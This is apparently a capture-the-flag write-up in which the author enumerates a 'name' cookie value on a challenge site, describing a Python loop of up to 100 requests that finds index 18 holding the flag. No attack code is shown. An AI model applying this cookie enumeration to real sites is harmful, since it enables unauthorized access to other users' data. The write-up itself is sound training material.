The first thing I did was click the search button to see what would happen. However, the only thing I received was an invalid search, so, as suggested by the challenge title, I decided to inspect the cookies from that invalid search.
Invalid Search Cookies
As we can see, the cookie name=-1 immediately stands out. From there, I thought there might be n cookies saved, and that I needed to find the correct one. In fact, after trying to search for snickerdoodle, which was the placeholder content in the input box, I got a valid search.
Snickerdoodle
Snickerdoodle Search
When I tried inspecting the cookies again using ChromeDevTools, I noticed that the name cookie had changed its value to 0.
Name 0
So, I immediately tried changing the value of the cookie to 1, and by refreshing the page with F5, I got this:
Name 1
As we can see, we performed a search for another cookie since the name of the cookie at the center of the page changed from snickerdoodle to chocolate. Now that we understand how the page works, all we need to do is find the correct index of the flag cookie to extract it. Let’s move on to the exploitation.
🎯 Solution Path
Exploitation Steps
Initial setup
The first thing I did, instead of doing it manually, was extract the index by writing a Python script. The script makes a maximum of 100 requests to the /check route, passing name=request_number. This way, the value of the name cookie changes with each iteration of the loop: the first request has 0, the second has 1, and so on. I then added a regex check, so that once the response to the request was obtained, if the regex matched the response, it would print the request index and break out of the loop.
Exploitation
So, for the exploitation, I just ran the script:
1
python3 exploit.py
And I waited to get the correct name cookie value (the one that contained the flag). Once I obtained it, I changed the name value to 18 (since that was the valid index), and after refreshing the page, I found the flag.
Flag capture
Manual Flag
🛠️ Exploitation Process
Approach
The exploit was based on setting a maximum limit of 100 POST requests, changing the value of the name cookie with the index from the request loop. Once I found the correct index (18) that contained the flag, I extracted it from the response using a regex and broke the loop.
